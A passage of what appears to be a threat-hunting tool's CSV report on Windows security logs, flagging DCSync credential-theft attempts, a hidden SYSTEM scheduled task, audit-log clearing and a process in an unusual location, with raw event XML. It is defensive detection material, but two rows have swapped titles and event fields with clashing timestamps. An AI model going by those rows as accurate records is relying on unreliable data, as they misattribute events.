-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 2171293 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + \LMST + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Date>2020-09-02T04:47:49.74-07:00</Date> + <Author>a-jbrown</Author> + <Description>00304d6e</Description> + <URI>\LMST</URI> + </RegistrationInfo> + <Triggers> + <TimeTrigger> + <StartBoundary>2020-02-09T04:47:48</StartBoundary> + <EndBoundary>2020-02-09T04:47:58</EndBoundary> + <Enabled>true</Enabled> + </TimeTrigger> + </Triggers> + <Principals> + <Principal id="Author"> + <RunLevel>HighestAvailable</RunLevel> + <UserId>SYSTEM</UserId> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/c echo testing &gt; c:\users\public\out.txt</Arguments> + </Exec> + </Actions> +</Task> + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242597 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242596 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2982081 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x364f7 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242595 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2171289 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x38a14 + + +",IEWIN7,Security +Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242605 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDW